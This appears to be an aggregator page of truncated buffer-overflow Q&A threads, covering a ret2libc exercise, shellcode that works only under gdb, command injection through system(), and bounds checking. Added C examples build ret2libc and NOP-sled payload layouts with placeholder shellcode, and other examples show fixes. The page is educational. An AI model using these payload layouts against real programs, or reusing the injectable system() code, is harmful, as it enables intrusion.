buffer-overflow

return to lib_c buffer overflow exercise issue

不羁岁月 submitted on 2019-12-29 03:27:10
Question: I'm supposed to come up with a program that exploits the "return to libc buffer overflow". This is, when executed, it cleanly exits and brings up a SHELL prompt. The program is executed in a bash terminal. Below is my C code:

    #include <stdio.h>
    #include <string.h>   /* for strcpy() */

    int main(int argc, char *argv[]) {
        char buffer[7];
        char buf[42];
        int i = 0;
        while (i < 28) {              /* padding up to the saved return address */
            buf[i] = 'a';
            i = i + 1;
        }
        *(int *)&buf[28] = 0x4c4ab0;
        *(int *)&buf[32] = 0x4ba520;
        *(int *)&buf[36] = 0xbfffff13;
        strcpy(buffer, buf);          /* overflows buffer[7] */
        return 0;
    }

Using gdb, I

Buffer overflow works in gdb but not without it

我是研究僧i submitted on 2019-12-27 16:28:15
Question: I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output:

    [root@localhost bufferoverflow]# gdb stack
    GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
    Copyright (C) 2010 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying" and

Buffer overflow works in gdb but not without it

随声附和 submitted on 2019-12-27 16:26:06
Question: I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output:

    [root@localhost bufferoverflow]# gdb stack
    GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
    Copyright (C) 2010 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying" and

Does Java have buffer overflows?

安稳与你 submitted on 2019-12-27 13:59:14
Question: Does Java have buffer overflows? If yes, can you give me scenarios?
Answer 1: Since Java Strings are based on char arrays and Java automatically checks array bounds, buffer overflows are only possible in unusual scenarios:
    - If you call native code via JNI
    - In the JVM itself (usually written in C++)
    - The interpreter or JIT compiler does not work correctly (Java bytecode mandates bounds checks)
Answer 2: Managed languages such as Java and C# do not have these problems, but the specific virtual machines (JVM

linux how to patch this code

狂风中的少年 submitted on 2019-12-25 04:15:20
Question:

    #include <WhatHere?>
    #include <WhatHere?>
    #include <WhatHere?>

    int main(int argc, char **argv) {
        char command[50] = "echo ";
        strcat(command, argv[1]);   // concatenate the input so that the final command is "echo <input>"
        system(command);            // call the system() function to print the input
        return 0;                   // denote that the program has finished executing successfully
    }

Can we get remote access by running this code? I know it is possible, but please help me patch it up.
Answer 1: Assuming that you're worried
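The program in the question has two separate problems: `strcat()` into a 50-byte buffer with no length check, and `system()` handing whatever `argv[1]` contains to `/bin/sh`, which is the part that turns an argument like `x; id` into command execution. The following is an added example, not the answer's code: it shows the bounded, metacharacter-checked version of the command string beside the fix a practitioner actually wants, which is to run `echo` directly through `execvp()` so no shell ever parses the input. The function names and the constructed `demo_argv` input are this example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Characters that let /bin/sh do more than echo the argument. */
int has_shell_meta(const char *s) {
    return strpbrk(s, ";|&$`\\\"'<>()*?[]{}~\n") != NULL;
}

/* The bounded, checked version of the original strcat(): builds "echo <input>"
 * into dst (cap bytes). Returns 0 on success, -1 if the result would not fit or
 * the input carries shell metacharacters. Only worth using if system() must stay. */
int build_echo_command(char *dst, size_t cap, const char *input) {
    if (has_shell_meta(input)) return -1;
    int n = snprintf(dst, cap, "echo %s", input);
    if (n < 0 || (size_t)n >= cap) return -1;   /* truncated: strcat() would have overflowed here */
    return 0;
}

/* The preferred fix: no shell at all. Runs argv[0] through execvp() in a child
 * and returns its exit status, or -1. The input is one argv element handed to
 * echo, never text a shell parses, so "hello; id" is simply printed. */
int run_noshell(char *const argv[]) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                 /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed demo input: what an attacker would pass as argv[1]. */
char *demo_argv[] = { "echo", "hello; id", NULL };
char cmd[50];                       /* same size as the question's command[] */

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s <text>\n", argv[0]);
        return 1;
    }
    if (build_echo_command(cmd, sizeof cmd, argv[1]) == 0)
        printf("bounded command for system(): %s\n", cmd);
    else
        printf("rejected for system(): too long or contains shell metacharacters\n");
    char *echo_argv[] = { "echo", argv[1], NULL };
    return run_noshell(echo_argv);
}
```

With `execvp()` there is nothing to inject into: the argument is delivered to `echo` as a single `argv` element regardless of its content, and the 50-byte `command[]` buffer disappears along with the overflow.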

Runs in gdb but not out of gdb

烂漫一生 submitted on 2019-12-25 02:41:00
Question: I am trying to spawn a shell with some shellcode. The payload is in the program itself; however, when I run the program individually I get a segmentation fault, but when running in gdb, my shell opens. Can someone point out what the problem might be?

    MrMox@ubuntu:~/folder$ ./a.out h h
    Segmentation fault (core dumped)
    MrMox@ubuntu:~/folder$ gdb -q a.out
    Reading symbols from /home/folder/a.out...done.
    (gdb) run h h
    Starting program: /home/folder/a.out h h
    process 22119 is executing new program
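This question and the two "works in gdb but not without it" questions above share a cause: gdb turns off address-space randomisation for the program it runs, and it runs the program in a different environment (it sets `LINES` and `COLUMNS`, and starts the binary by its absolute path, as the `Starting program: /home/folder/a.out` line shows). The environment strings live at the top of the stack, so a different environment moves every stack frame below them, and a return address that was correct under gdb points into the wrong place outside it. The following is an added example, not code from any of the posters, that lets you measure both effects; the function names are this example's own and `sample_env` is a constructed environment.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Bytes the environment occupies near the top of the stack: the strings
 * themselves plus the NULL-terminated pointer array. A larger footprint
 * pushes every frame below it to a lower address, which is why hard-coded
 * stack addresses differ between "./a.out" and "gdb ./a.out". */
size_t env_footprint(char **envp) {
    size_t n = 0, bytes = 0;
    for (; envp[n]; n++)
        bytes += strlen(envp[n]) + 1;
    return bytes + (n + 1) * sizeof(char *);
}

/* Kernel ASLR setting: 0 = off, 1 = stack/mmap/vdso, 2 = also brk.
 * Returns -1 if the file is unavailable (non-Linux, restricted container).
 * gdb runs the inferior with randomisation disabled regardless of this value. */
int aslr_setting(void) {
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (f) {
        if (fscanf(f, "%d", &v) != 1) v = -1;
        fclose(f);
    }
    return v;
}

/* Constructed environment for the demo: 4 + 6 string bytes, 3 pointers. */
char *sample_env[] = { "A=1", "BB=22", NULL };

int main(int argc, char **argv, char **envp) {
    char probe[64];                 /* a stack buffer whose address we compare */
    (void)argc;
    printf("argv[0]              = %s\n", argv[0]);
    printf("env footprint        = %zu bytes (sample env: %zu)\n",
           env_footprint(envp), env_footprint(sample_env));
    printf("randomize_va_space   = %d\n", aslr_setting());
    printf("&probe               = %p\n", (void *)probe);
    return 0;
}
```

Run it once as `./a.out` and once under `gdb -q ./a.out` with `run`, and compare `&probe` and the footprint: the difference is the shift your exploit has to absorb. To reproduce gdb's conditions outside gdb, disable randomisation and clear the environment for one run (`setarch "$(uname -m)" -R env -i ./a.out`); to make gdb closer to a plain run, use `unset environment LINES`, `unset environment COLUMNS` and start the binary by the same relative path. `show disable-randomization` in gdb tells you whether it is switching ASLR off. The usual payload-side answer is a NOP sled large enough to cover the shift.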

Assembly MOV Instruction

最后都变了- submitted on 2019-12-24 10:47:09
Question: Hi guys, I'm working on a CTF challenge and don't quite understand this asm command:

    mov %edx,0x20(%esp,%eax,4)

I'm assuming it's: move $edx into (0x20 + $esp + $eax + 4). However, when I checked this with gdb it isn't correct. Anyone mind explaining how this instruction works? Thanks for your help!
Answer 1: AT&T syntax for x86 memory references goes like this: displacement(base,index,scale), giving the address of displacement+base+(index*scale). That is, the destination memory address for your instruction
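The answer's formula is easy to get wrong by hand, as the question shows (the `4` is a multiplier on `%eax`, not an addend). The following is an added example, not the answer's code: a small parser for AT&T memory operands of the `disp(base,index,scale)` form, including the variants with a missing displacement, base or index, plus the effective-address arithmetic, so an instruction like the one in the question can be checked against register values copied from gdb's `info registers`. The register values in `demo_reg` are made up for the demo; the function names are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

typedef struct {
    int32_t disp;       /* signed displacement, 0 if absent */
    char base[8];       /* register name without '%', "" if absent */
    char index[8];      /* register name without '%', "" if absent */
    int scale;          /* 1, 2, 4 or 8; 1 if absent */
} att_mem;

/* Read a "%reg" token at *p into out (without the '%'); 0 on a bad token. */
static int take_reg(const char **p, char *out, size_t cap) {
    if (**p != '%') return 0;
    (*p)++;
    size_t n = 0;
    while (**p && **p != ',' && **p != ')') {
        if (n + 1 >= cap) return 0;
        out[n++] = *(*p)++;
    }
    out[n] = '\0';
    return n > 0;
}

/* Accepts "0x20(%esp,%eax,4)", "-4(%ebp)", "(%esp,%eax,4)", "(,%eax,4)" and a
 * bare absolute address "0x8049000". Returns 1 on success, 0 if malformed. */
int parse_att_mem(const char *s, att_mem *m) {
    memset(m, 0, sizeof *m);
    m->scale = 1;
    const char *p = s;
    char *end;
    if (*p != '(') {                            /* optional displacement */
        long d = strtol(p, &end, 0);            /* base 0: decimal or 0x hex */
        if (end == p) return 0;
        m->disp = (int32_t)d;
        p = end;
        if (*p == '\0') return 1;               /* absolute address, no parentheses */
    }
    if (*p++ != '(') return 0;
    if (*p == '%' && !take_reg(&p, m->base, sizeof m->base)) return 0;
    if (*p == ',') {                            /* index and optional scale */
        p++;
        if (!take_reg(&p, m->index, sizeof m->index)) return 0;
        if (*p == ',') {
            p++;
            m->scale = (int)strtol(p, &end, 10);
            if (end == p) return 0;
            if (m->scale != 1 && m->scale != 2 && m->scale != 4 && m->scale != 8) return 0;
            p = end;
        }
    }
    if (*p++ != ')') return 0;
    return *p == '\0';
}

/* The formula from the answer: disp + base + index*scale. */
uint32_t effective_address(const att_mem *m, uint32_t (*reg)(const char *)) {
    uint32_t ea = (uint32_t)m->disp;
    if (m->base[0])  ea += reg(m->base);
    if (m->index[0]) ea += reg(m->index) * (uint32_t)m->scale;
    return ea;
}

/* Made-up register file standing in for gdb's "info registers". */
static uint32_t demo_reg(const char *name) {
    if (!strcmp(name, "esp")) return 0xbffff000u;
    if (!strcmp(name, "ebp")) return 0xbffff100u;
    if (!strcmp(name, "eax")) return 3;
    return 0;
}

/* Parse and evaluate with demo_reg; 0xffffffff signals a parse error. */
uint32_t demo_ea(const char *operand) {
    att_mem m;
    if (!parse_att_mem(operand, &m)) return 0xffffffffu;
    return effective_address(&m, demo_reg);
}

int main(void) {
    const char *op = "0x20(%esp,%eax,4)";
    printf("%s -> 0x%08x  (0x20 + esp + eax*4, with eax = 3)\n", op, demo_ea(op));
    printf("-4(%%ebp) -> 0x%08x\n", demo_ea("-4(%ebp)"));
    return 0;
}
```

With `%eax` = 3 the question's operand resolves to `esp + 0x20 + 12`, i.e. the fourth 4-byte slot of an array that starts 0x20 bytes above the stack pointer, which is the pattern a compiler emits for `array[i] = value` on a local array.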

A buffer overflow exercise using a shellcode

流过昼夜 submitted on 2019-12-24 05:17:05
Question: I have been doing an exercise about a buffer overflow in a C program; the goal of this problem is to get the root shell once I have inserted a shellcode into the program. This is what I have until now:
STEP 1. First of all, let's see my C code in the file called file.c:

    root@kali:~# cat ./file.c
    #include <stdio.h>
    #include <string.h>

    void premio() {
        printf("I have altered the programs flow\n");
    }

    int main(int argc, char *argv[]) {
        char buffer[100];
        if (argc != 2) {
            printf("Use: %s argument\n", argv[0
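Both this exercise and the return-to-libc question at the top of the page come down to laying out bytes so that the saved return address is overwritten with a chosen value and whatever follows it is what the new code expects to find on the stack. The following is an added example serving both questions; it is not code from either poster. It builds the two classic 32-bit layouts, a ret2libc frame and a NOP sled plus shellcode, and checks the payload for NUL bytes, because a `strcpy()`-style overflow stops at the first one. The offset 28 and the three addresses used in `main()` are copied from the first question in the order written there; reading them as `system`, `exit` and `"/bin/sh"` is the usual ret2libc order and an assumption. The shellcode slot holds `int3` placeholders, not real shellcode, and the frame length and return address for that layout are made up.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MAX_PAYLOAD 512

/* Scratch buffer the demos fill; in use it would go to the target's argv or stdin. */
unsigned char payload[MAX_PAYLOAD];

/* Placeholder for shellcode: four int3 instructions, which trap rather than
 * run anything. A real payload would replace this; the example ships none. */
const unsigned char demo_sc[] = { 0xcc, 0xcc, 0xcc, 0xcc };

/* Store a 32-bit value little-endian, the byte order the x86 stack uses. */
static void put_le32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Index of the first NUL byte in the payload, or -1. strcpy()/strcat() stop
 * copying there, so anything after it never reaches the target's stack. */
int first_nul(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return (int)i;
    return -1;
}

/* return-to-libc frame:
 *   [pad bytes up to the saved return address]
 *   [&system] [&exit: what system() "returns" into] [&"/bin/sh": system's argument]
 * Returns the payload length, or 0 if it does not fit in cap. */
size_t build_ret2libc(unsigned char *out, size_t cap, size_t pad,
                      uint32_t system_addr, uint32_t exit_addr, uint32_t binsh_addr) {
    if (pad + 12 > cap) return 0;
    memset(out, 'A', pad);
    put_le32(out + pad,     system_addr);
    put_le32(out + pad + 4, exit_addr);
    put_le32(out + pad + 8, binsh_addr);
    return pad + 12;
}

/* Shellcode frame: [NOP sled][shellcode] filling frame_len bytes, then
 * ret_addr repeated ret_copies times. frame_len is the distance from the
 * buffer start to the saved return address; ret_addr only has to land inside
 * the sled, which is what lets the payload survive a modest stack shift. */
size_t build_shellcode_payload(unsigned char *out, size_t cap, size_t frame_len,
                               const unsigned char *sc, size_t sc_len,
                               uint32_t ret_addr, size_t ret_copies) {
    size_t total = frame_len + 4 * ret_copies;
    if (sc_len > frame_len || total > cap) return 0;
    size_t sled = frame_len - sc_len;
    memset(out, 0x90, sled);                    /* 0x90 = nop */
    memcpy(out + sled, sc, sc_len);
    for (size_t i = 0; i < ret_copies; i++)
        put_le32(out + frame_len + 4 * i, ret_addr);
    return total;
}

int main(void) {
    /* Offset and addresses from the first question, in the order written there. */
    size_t n = build_ret2libc(payload, sizeof payload, 28, 0x4c4ab0u, 0x4ba520u, 0xbfffff13u);
    int nul = first_nul(payload, n);
    printf("ret2libc payload: %zu bytes, first NUL at byte %d\n", n, nul);
    if (nul >= 0)
        printf("  a strcpy() overflow stops after byte %d; later words never land\n", nul);

    /* Made-up frame length and return address for the shellcode layout. */
    n = build_shellcode_payload(payload, sizeof payload, 112,
                                demo_sc, sizeof demo_sc, 0xbffff5a0u, 4);
    printf("shellcode payload: %zu bytes (%zu-byte sled)\n", n, 112 - sizeof demo_sc);
    return 0;
}
```

The addresses themselves come from gdb on the target (`p system`, `p exit`, and a search of libc's mapped range for the string `/bin/sh`, or `strings -t x` on the libc file plus the mapping base). The NUL check matters for the first question's numbers: `0x4c4ab0` is stored as `b0 4a 4c 00`, so a `strcpy()` copy of that payload ends after the first address and the two words meant for `exit` and `"/bin/sh"` never reach the stack.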

Preventing buffer overflow in C/C++

南楼画角 submitted on 2019-12-24 04:48:28
Question: Many times I have problems with buffer overflow.

    int y[10][10][10];
    ...
    y[0][15][3] = 8;

How can I prevent this problem? Is there any good tool that can help me?
Answer 1: Neil's answer is better in the general case, but if you have a reason for using plain old arrays, you can use functions to get and set the values and also check that you're within the array bounds:

    #define MAX_INDEX 10
    int y[MAX_INDEX][MAX_INDEX][MAX_INDEX];

    int get_y(int a, int b, int c) {
        ASSERT(a >= 0 && a < MAX_INDEX);
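The write in the question is worse than a crash: `y[0][15][3]` stays inside the 4000-byte object, so it silently lands on another element instead of faulting. The following is an added example, not the answer's code, showing where it lands and a checked accessor in the style the answer proposes but returning an error instead of asserting, so callers can handle bad indices. The array dimension follows the question; the function names are this example's own.

```c
#include <stdio.h>
#include <stddef.h>

#define DIM 10
static int y[DIM][DIM][DIM];

/* The flat offset the compiler actually uses: y[a][b][c] is element
 * a*100 + b*10 + c of one contiguous block of 1000 ints, whatever the
 * individual indices are. Two different index triples can map to one element. */
ptrdiff_t flat_index(int a, int b, int c) {
    return (ptrdiff_t)a * DIM * DIM + (ptrdiff_t)b * DIM + c;
}

/* 0 if every index is in range, otherwise -1. */
int y_check(int a, int b, int c) {
    return (a >= 0 && a < DIM && b >= 0 && b < DIM && c >= 0 && c < DIM) ? 0 : -1;
}

/* Checked write: refuses out-of-range indices instead of clobbering a neighbour. */
int y_set(int a, int b, int c, int v) {
    if (y_check(a, b, c) != 0) return -1;
    y[a][b][c] = v;
    return 0;
}

/* Checked read: returns dflt for out-of-range indices. */
int y_get_or(int a, int b, int c, int dflt) {
    return y_check(a, b, c) != 0 ? dflt : y[a][b][c];
}

int main(void) {
    printf("flat offset of y[0][15][3] = %td, of y[1][5][3] = %td\n",
           flat_index(0, 15, 3), flat_index(1, 5, 3));
    printf("y_set(0, 15, 3, 8) -> %d (rejected)\n", y_set(0, 15, 3, 8));
    return 0;
}
```

Because the bad write never leaves the object, AddressSanitizer (which checks object boundaries) does not report it; for constant indices GCC's `-Warray-bounds` warns at compile time, and `-fsanitize=bounds` (UBSan) catches it at run time for arrays of known size, which is the tool to reach for when the indices are computed.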

Appending character arrays using strcat does not work

戏子无情 submitted on 2019-12-24 02:18:31
Question: Can someone tell me what's wrong with this code?

    char sms[] = "gr8";
    strcat(sms, " & :)");

Answer 1: sms is an array of size 4 [1]. And you're appending more char literals, which is going outside of the array, as the array can accommodate at most 4 chars, which are already occupied by g, r, 8, \0.
[1] By the way, why exactly 4? Answer: Because there is a null character at the end!
If you mention the size of the array as shown below, then your code is valid and well-defined.

    char sms[10] = "gr8";
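`strcat()` has no idea how big the destination is; only the caller does. The following is an added example, not the answer's code: an append that takes the destination's capacity and refuses rather than overflowing, run on both arrays from the question. Unlike `strncat()`, whose count limits how much is appended rather than the size of the buffer, the bound here is the whole buffer. The function names are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Append src to dst, which has room for cap bytes including the terminator.
 * Returns 0 on success, -1 (dst untouched) if the result would not fit. */
int append_bounded(char *dst, size_t cap, const char *src) {
    size_t used = 0;
    while (used < cap && dst[used] != '\0') used++;
    if (used == cap) return -1;                 /* dst has no terminator inside cap */
    size_t need = strlen(src);
    if (need >= cap - used) return -1;          /* src plus its NUL would not fit */
    memcpy(dst + used, src, need + 1);
    return 0;
}

/* The question's first array: sizeof sms == 4 (g, r, 8, NUL), so nothing fits. */
int demo_sizeof_trap(void) {
    char sms[] = "gr8";
    return append_bounded(sms, sizeof sms, " & :)");
}

/* The answer's fix: 10 bytes holds "gr8 & :)" (8 chars) plus the terminator. */
const char *demo_with_room(void) {
    static char sms[10] = "gr8";
    strcpy(sms, "gr8");                         /* reset so repeated calls behave the same */
    if (append_bounded(sms, sizeof sms, " & :)") != 0) return NULL;
    return sms;
}

int main(void) {
    printf("char sms[] = \"gr8\";   append -> %d\n", demo_sizeof_trap());
    printf("char sms[10] = \"gr8\"; append -> \"%s\"\n", demo_with_room());
    return 0;
}
```

Passing `sizeof sms` works only while `sms` is an array in scope; once it decays to a pointer (for instance inside a called function) `sizeof` gives the pointer size, and the capacity has to travel as a separate parameter.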